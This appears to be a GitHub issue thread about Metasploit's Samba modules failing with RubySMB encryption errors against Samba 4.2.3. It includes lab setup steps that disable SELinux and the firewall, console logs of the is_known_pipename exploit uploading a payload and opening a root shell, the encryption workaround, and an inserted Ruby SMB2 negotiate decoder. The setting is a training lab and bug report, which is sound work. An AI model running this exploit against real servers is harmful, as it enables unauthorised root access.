Open MeatBunny opened 3 years ago
@MeatBunny Thanks for raising an issue! :+1:
Out of interest, does this workaround resolve the problem? https://github.com/rapid7/metasploit-framework/issues/14355#issuecomment-873148906
@adfoster-r7 Apparently my Google-fu failed me previously. With the workaround the exploit works as expected. Thanks.
Edit: Would it be appropriate to change the default options for this particular exploit to those values or wait on a fix for the underlying issue?
@MeatBunny Thanks! That might be a good idea. Out of interest, are you running into Samba servers during pen tests? Or is this just a lab environment that you're using? Trying to get a sense for the amount of people this change would impact
@adfoster-r7 This was for a training lab (teaching students 445 != Windows). It's been a few years since I was on keyboard, so this is pure opinion at this point. I probably ran into Samba machines once or twice a year, so not terribly common.
That particular exploit module probably doesn't see much use these days. I just happened to use it 4-5x in a row at the IOT CTF a few years back and thought it was a neat thing to use in a lab.
I suspect the bigger impact is that some of the auxiliary scanning modules are having the same (or similar) difficulties. Did some more testing against modern versions of Samba in CentOS 8 and Ubuntu 20.04 using the same configuration and it seems to be failing for other reasons.
EDIT: As a follow up I was talking to an individual who does engagements in the medical field and they mentioned seeing Samba running on medical IOT devices, imaging devices, network and phone appliances, and other pieces of on-prem equipment.
┌──(root💀kali)-[~]
└─# for i in {130,131,132}; do smbmap -H 172.20.8.$i; done
[+] Guest session       IP: 172.20.8.130:445    Name: 172.20.8.130
        Disk            Permissions     Comment
        ----            -----------     -------
        share           READ, WRITE     Test share.
        IPC$            NO ACCESS       IPC Service (Testing MSF on CentOS 7.1)
[+] IP: 172.20.8.131:445        Name: 172.20.8.131
        Disk            Permissions     Comment
        ----            -----------     -------
        share           READ, WRITE     Test share.
        IPC$            NO ACCESS       IPC Service (Testing MSF on Ubuntu 20.04)
[+] IP: 172.20.8.132:445        Name: 172.20.8.132
        Disk            Permissions     Comment
        ----            -----------     -------
        share           READ, WRITE     Test share.
        IPC$            NO ACCESS       IPC Service (Testing MSF on CentOS 8.3)
┌──(root💀kali)-[~]
└─# msfconsole
https://metasploit.com
=[ metasploit v6.0.52-dev ]
+ -- --=[ 2147 exploits - 1143 auxiliary - 365 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Use help <command> to learn more about any command
msf6 > setg verbose true
verbose => true
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  1                yes       The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_version) > setg RHOSTS 172.20.8.130 172.20.8.131 172.20.8.132
RHOSTS => 172.20.8.130 172.20.8.131 172.20.8.132
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 172.20.8.130:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 172.20.8.130:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:optional) (guid:{746e6563-736f-0037-0000-000000000000}) (authentication domain:CENTOS7)
[*] 172.20.8.130:445 - Host could not be identified: Windows 6.1 (Samba 4.2.3)
[*] Scanned 1 of 3 hosts (33% complete)
[*] 172.20.8.131:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 172.20.8.131:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{30326275-3430-0000-0000-000000000000}) (authentication domain:UB2004)
[*] 172.20.8.131:445 - Host could not be identified
[*] Scanned 2 of 3 hosts (66% complete)
[*] 172.20.8.132:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 2 of 3 hosts (66% complete)
[*] 172.20.8.132:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{746e6563-736f-0038-0000-000000000000}) (authentication domain:CENTOS8)
[*] 172.20.8.132:445 - Host could not be identified
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[-] 172.20.8.130:139 - Error: '172.20.8.130' 'RubySMB::Error::EncryptionError' 'Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.'
[-] 172.20.8.130:445 - Error: '172.20.8.130' 'RubySMB::Error::EncryptionError' 'Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.'
[*] Scanned 1 of 3 hosts (33% complete)
[-] 172.20.8.131:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[-] 172.20.8.131:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMB::AlwaysEncrypt false
SMB::AlwaysEncrypt => false
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[-] 172.20.8.130:139 - Error: '172.20.8.130' 'RubySMB::Error::UnexpectedStatusCode' 'The server responded with an unexpected status code: STATUS_ACCESS_DENIED'
[-] 172.20.8.130:445 - Error: '172.20.8.130' 'RubySMB::Error::UnexpectedStatusCode' 'The server responded with an unexpected status code: STATUS_ACCESS_DENIED'
[*] Scanned 1 of 3 hosts (33% complete)
[-] 172.20.8.131:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[-] 172.20.8.131:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMB::ProtocolVersion 1,2
SMB::ProtocolVersion => 1,2
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[!] 172.20.8.130:139 - peer_native_os is only available with SMB1 (current version: SMB2)
[!] 172.20.8.130:139 - peer_native_lm is only available with SMB1 (current version: SMB2)
[+] 172.20.8.130:139 - share - (DISK) Test share.
[+] 172.20.8.130:139 - IPC$ - (IPC) IPC Service (Testing MSF on CentOS 7.1)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 172.20.8.131:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[-] 172.20.8.131:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > exit
┌──(root💀kali)-[~]
└─# mkdir /mnt/{130,131,132}
┌──(root💀kali)-[~]
└─# for i in {130,131,132}; do mount -t cifs -o guest //172.20.8.$i/share /mnt/$i ; ls -la /mnt/$i; done
total 4
drwxr-xr-x 2 root root 0 Jul 22 17:27 .
drwxr-xr-x 5 root root 4096 Jul 22 17:38 ..
-rwxr-xr-x 1 root root 0 Jul 22 17:08 shared_file_130
total 4
drwxr-xr-x 2 root root 0 Jul 22 17:27 .
drwxr-xr-x 5 root root 4096 Jul 22 17:38 ..
-rwxr-xr-x 1 root root 0 Jul 22 17:06 shared_file_131
total 4
drwxr-xr-x 2 root root 0 Jul 22 17:36 .
drwxr-xr-x 5 root root 4096 Jul 22 17:38 ..
-rwxr-xr-x 1 root root 0 Jul 22 17:07 shared_file_132
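The smb_version output above shows the three servers advertising encryption in two different ways: the Samba 4.2.3 host negotiates SMB 3.0, where a server can only signal encryption with the SMB2_GLOBAL_CAP_ENCRYPTION bit in the Capabilities field, while the two SMB 3.1.1 hosts list their ciphers (AES-128-CCM, AES-128-GCM) in an SMB2_ENCRYPTION_CAPABILITIES negotiate context. The following Ruby decoder for the SMB2 NEGOTIATE response is an added example, not code from this issue, from Metasploit or from RubySMB; it reports which of the two mechanisms a response uses and whether a client following MS-SMB2 would treat the server as encryption-capable. The sample responses are constructed by hand to resemble the three lab hosts (dialect, capability bit and cipher list only), not captured from them.

```ruby
# Added example: decode an SMB2 NEGOTIATE response and report how the server
# advertises encryption. Not Metasploit or RubySMB code; the sample responses
# below are constructed by hand (modelled on the three lab hosts), not captures.

SMB2_MAGIC                   = [0xFE, 0x53, 0x4D, 0x42].pack('C*')   # "\xFE" "SMB"
SMB2_HEADER_SIZE             = 64
SMB2_GLOBAL_CAP_ENCRYPTION   = 0x00000040   # Capabilities bit, consulted for dialects 3.0 / 3.0.2
SMB2_ENCRYPTION_CAPABILITIES = 0x0002       # NegotiateContext type, dialect 3.1.1 only
DIALECTS = { 0x0202 => 'SMB 2.0.2', 0x0210 => 'SMB 2.1', 0x0300 => 'SMB 3.0',
             0x0302 => 'SMB 3.0.2', 0x0311 => 'SMB 3.1.1' }.freeze
CIPHERS  = { 0x0001 => 'AES-128-CCM', 0x0002 => 'AES-128-GCM' }.freeze

# Build a minimal NEGOTIATE response: 64-byte header, 64-byte fixed body and,
# for 3.1.1, one SMB2_ENCRYPTION_CAPABILITIES context at the 8-byte-aligned
# offset right after the body. Only the fields the parser reads are filled in.
def build_negotiate_response(dialect, capabilities, ciphers = [])
  header = SMB2_MAGIC +
           [64, 0, 0, 0, 1, 0x1, 0, 0, 0, 0, 0].pack('vvVvvVVQ<VVQ<') +  # StructureSize .. SessionId, Flags=SERVER_TO_REDIR
           ("\0" * 16).b                                              # Signature (unsigned)
  contexts = ''.b
  if dialect == 0x0311
    data = [ciphers.length, *ciphers].pack('v*')                      # CipherCount, Ciphers[]
    contexts = [SMB2_ENCRYPTION_CAPABILITIES, data.bytesize, 0].pack('vvV') + data
  end
  context_offset = contexts.empty? ? 0 : SMB2_HEADER_SIZE + 64
  body = [65, 0x1, dialect, contexts.empty? ? 0 : 1].pack('vvvv') +  # StructureSize, SecurityMode, Dialect, ContextCount
         ("\0" * 16).b +                                              # ServerGuid
         [capabilities, 0x800000, 0x800000, 0x800000].pack('VVVV') +  # Capabilities, MaxTransact/Read/Write
         [0, 0].pack('Q<Q<') +                                        # SystemTime, ServerStartTime
         [SMB2_HEADER_SIZE + 64, 0, context_offset].pack('vvV')       # SecurityBufferOffset/Length, NegotiateContextOffset
  header + body + contexts
end

# Decide whether the server advertises encryption the way an MS-SMB2 client
# interprets it: 3.0/3.0.2 via SMB2_GLOBAL_CAP_ENCRYPTION, 3.1.1 via a
# non-empty cipher list in the encryption capabilities context.
def parse_negotiate_response(packet)
  packet = packet.b
  raise ArgumentError, 'not an SMB2 packet' unless packet[0, 4] == SMB2_MAGIC
  body = packet[SMB2_HEADER_SIZE..-1]
  structure_size, _security_mode, dialect, context_count = body.unpack('vvvv')
  raise ArgumentError, 'bad NEGOTIATE StructureSize' unless structure_size == 65
  capabilities   = body[24, 4].unpack1('V')
  context_offset = body[60, 4].unpack1('V')        # counted from the start of the SMB2 header
  ciphers = []
  if dialect == 0x0311
    off = context_offset
    context_count.times do
      type, len = packet[off, 4].unpack('vv')      # ContextType, DataLength (then 4 reserved bytes)
      data = packet[off + 8, len]
      if type == SMB2_ENCRYPTION_CAPABILITIES
        count = data.unpack1('v')
        ciphers = data[2, 2 * count].unpack('v*')
      end
      off += 8 + len
      off += (8 - off % 8) % 8                     # the next context is 8-byte aligned
    end
  end
  cap_flag = (capabilities & SMB2_GLOBAL_CAP_ENCRYPTION) != 0
  advertises = case dialect
               when 0x0300, 0x0302 then cap_flag
               when 0x0311 then !ciphers.empty?
               else false
               end
  { dialect: DIALECTS.fetch(dialect) { format('0x%04x', dialect) },
    cap_encryption: cap_flag,
    ciphers: ciphers.map { |c| CIPHERS.fetch(c) { format('0x%04x', c) } },
    advertises_encryption: advertises }
end

# Constructed samples (assumed shapes, not captures); 0x1 is SMB2_GLOBAL_CAP_DFS.
SAMBA_423_LIKE   = build_negotiate_response(0x0300, 0x1 | SMB2_GLOBAL_CAP_ENCRYPTION)  # like the CentOS 7.1 host
UBUNTU_2004_LIKE = build_negotiate_response(0x0311, 0x1, [0x0001])                     # AES-128-CCM, like Ubuntu 20.04
CENTOS_8_LIKE    = build_negotiate_response(0x0311, 0x1, [0x0002])                     # AES-128-GCM, like CentOS 8.3
SMB21_ONLY       = build_negotiate_response(0x0210, 0x1)                               # no encryption at all

if __FILE__ == $PROGRAM_NAME
  { 'Samba 4.2.3-like' => SAMBA_423_LIKE, 'Ubuntu 20.04-like' => UBUNTU_2004_LIKE,
    'CentOS 8.3-like' => CENTOS_8_LIKE, 'SMB 2.1 only' => SMB21_ONLY }.each do |name, pkt|
    puts "#{name}: #{parse_negotiate_response(pkt)}"
  end
end
```

For the SMB 3.0 sample the decoder returns cap_encryption true with an empty cipher list, which is the combination the thread runs into: the client sees the capability bit, encrypts the request, and the 4.2.3 server cannot handle it. Setting SMB::AlwaysEncrypt false stops the client from acting on that bit, and pinning SMB::ProtocolVersion to 1,2 keeps the negotiated dialect below 3.0, where the bit is not consulted at all, which is why share enumeration against the CentOS 7 host only succeeds with both options set.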
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
@adfoster-r7 Should this issue be kept open? Not sure how much of an edge case it is.
Thanks! Will keep it open until the issue is fixed :+1:
Description
Metasploit v6.0.52-dev throws Ruby errors when attempting to connect to a Samba 4.2.3 server where previously Metasploit 4.16.48-dev worked without issue. This was tested with both the smb_enumshares module and the is_known_pipename exploit.
Steps to reproduce
[share]
path = /srv/share
comment = Test share.
read only = no
guest ok = yes
browsable = yes
public = yes
EOF
Disable SELinux
sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config
mkdir /srv/share
chmod 777 /srv/share
systemctl disable firewalld
systemctl stop firewalld
systemctl mask firewalld
iptables -L -v -n
testparm
systemctl enable smb
Reboot to disable SELinux
reboot
ss -antp | grep 445 && systemctl status smb && ip a
msf > setg verbose true
verbose => true
msf > setg RHOSTS 172.20.8.130
RHOSTS => 172.20.8.130
msf > setg RHOST 172.20.8.130
RHOST => 172.20.8.130
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(scanner/smb/smb_enumshares) > show options
Module options (auxiliary/scanner/smb/smb_enumshares):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   LogSpider       3                no        0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3)
   MaxDepth        999              yes       Max number of subdirectories to spider
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          172.20.8.130     yes       The target address range or CIDR identifier
   SMBDomain       .                no        The Windows domain to use for authentication
   SMBPass                          no        The password for the specified username
   SMBUser                          no        The username to authenticate as
   ShowFiles       false            yes       Show detailed information when spidering
   SpiderProfiles  true             no        Spider only user profiles when share = C$
   SpiderShares    false            no        Spider shares recursively
   THREADS         1                yes       The number of concurrent threads
msf auxiliary(scanner/smb/smb_enumshares) > run
[+] 172.20.8.130:139 - share - (DS) Test share.
[+] 172.20.8.130:139 - IPC$ - (I) IPC Service (Testing is_known_pipename exploit.)
[*] 172.20.8.130: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_enumshares) > use exploit/linux/samba/is_known_pipename
msf exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST           172.20.8.130     yes       The target address
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory
Exploit target:
Id Name
0 Automatic (Interact)
msf exploit(linux/samba/is_known_pipename) > exploit
[*] 172.20.8.130:445 - Using location \\172.20.8.130\share\ for the path
[*] 172.20.8.130:445 - Retrieving the remote path of the share 'share'
[*] 172.20.8.130:445 - Share 'share' has server-side path '/srv/share
[*] 172.20.8.130:445 - Using payload wrapper 'samba-root-findsock-x86_64'...
[*] 172.20.8.130:445 - Uploaded payload to \\172.20.8.130\share\gLbZJPxB.so
[*] 172.20.8.130:445 - Loading the payload from server-side path /srv/share/gLbZJPxB.so using \PIPE\/srv/share/gLbZJPxB.so...
[-] 172.20.8.130:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 172.20.8.130:445 - Loading the payload from server-side path /srv/share/gLbZJPxB.so using /srv/share/gLbZJPxB.so...
[+] 172.20.8.130:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (172.20.8.129:36343 -> 172.20.8.130:445) at 2021-07-13 12:47:09 -0400
uname -a
Linux is-known-pipename 3.10.0-327.el7.x86_64 #1 SMP Thu Nov 19 22:10:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/os-release
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
rpm -qi samba
Name        : samba
Epoch       : 0
Version     : 4.2.3
Release     : 10.el7
Architecture: x86_64
Install Date: Tue Jul 13 12:27:41 2021
Group       : System Environment/Daemons
Size        : 1844670
License     : GPLv3+ and LGPLv3+
Signature   : RSA/SHA256, Wed Nov 25 10:38:00 2015, Key ID 24c6a8a7f4a80eb5
Source RPM  : samba-4.2.3-10.el7.src.rpm
Build Date  : Fri Nov 20 13:28:13 2015
Build Host  : worker1.bsys.centos.org
Relocations : (not relocatable)
Packager    : CentOS BuildSystem <http://bugs.centos.org>
Vendor      : CentOS
URL         : http://www.samba.org/
Summary     : Server and Client software to interoperate with Windows machines
Description :
Samba is the standard Windows interoperability suite of programs for Linux and Unix.
Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it with setg RHOSTS x.x.x.x
msf6 > setg verbose true
verbose => true
msf6 > setg RHOSTS 172.20.8.130
RHOSTS => 172.20.8.130
msf6 > setg RHOST 172.20.8.130
RHOST => 172.20.8.130
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(scanner/smb/smb_enumshares) > show options
Module options (auxiliary/scanner/smb/smb_enumshares):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   LogSpider       3                no        0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3)
   MaxDepth        999              yes       Max number of subdirectories to spider
   RHOSTS          172.20.8.130     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain       .                no        The Windows domain to use for authentication
   SMBPass                          no        The password for the specified username
   SMBUser                          no        The username to authenticate as
   ShowFiles       false            yes       Show detailed information when spidering
   SpiderProfiles  true             no        Spider only user profiles when share = C$
   SpiderShares    false            no        Spider shares recursively
   THREADS         1                yes       The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[-] 172.20.8.130:139 - Error: '172.20.8.130' 'RubySMB::Error::EncryptionError' 'Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.'
[-] 172.20.8.130:445 - Error: '172.20.8.130' 'RubySMB::Error::EncryptionError' 'Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.'
[*] 172.20.8.130: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMB::AlwaysEncrypt false
SMB::AlwaysEncrypt => false
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[-] 172.20.8.130:139 - Error: '172.20.8.130' 'RubySMB::Error::UnexpectedStatusCode' 'The server responded with an unexpected status code: STATUS_ACCESS_DENIED'
[-] 172.20.8.130:445 - Error: '172.20.8.130' 'RubySMB::Error::UnexpectedStatusCode' 'The server responded with an unexpected status code: STATUS_ACCESS_DENIED'
[*] 172.20.8.130: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > use exploit/linux/samba/is_known_pipename
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          172.20.8.130     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory
Payload options (cmd/unix/interact):
Name Current Setting Required Description
Exploit target:
Id Name
0 Automatic (Interact)
msf6 exploit(linux/samba/is_known_pipename) > exploit
[-] 172.20.8.130:445 - Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/samba/is_known_pipename) > set SMB::AlwaysEncrypt false
SMB::AlwaysEncrypt => false
msf6 exploit(linux/samba/is_known_pipename) > exploit
[-] 172.20.8.130:445 - Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED
[*] Exploit completed, but no session was created.
msf6 exploit(linux/samba/is_known_pipename) >
[05/19/2021 11:18:32] [d(0)] core: Created user based module store
[07/13/2021 12:49:15] [d(0)] core: Updated user based module store
[07/13/2021 12:49:18] [d(0)] core: HistoryManager.push_context name: :msfconsole
[07/13/2021 12:52:03] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[07/13/2021 12:52:08] [d(0)] core: HistoryManager.push_context name: :msfconsole
[07/13/2021 12:52:51] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[07/13/2021 12:52:56] [d(0)] core: Negotiated SMB version: SMB3
[07/13/2021 12:52:58] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[07/13/2021 12:53:02] [d(0)] core: Negotiated SMB version: SMB3
[07/13/2021 12:53:15] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[07/13/2021 12:53:19] [d(0)] core: Negotiated SMB version: SMB3
[07/13/2021 12:53:21] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[07/13/2021 12:53:25] [d(0)] core: Negotiated SMB version: SMB3
[07/13/2021 12:54:32] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[07/13/2021 12:54:36] [d(0)] core: Negotiated SMB version: SMB3
[07/13/2021 12:54:38] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request. - RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.
[07/13/2021 12:54:44] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[07/13/2021 12:54:48] [d(0)] core: Negotiated SMB version: SMB3
[07/13/2021 12:54:50] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED - RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED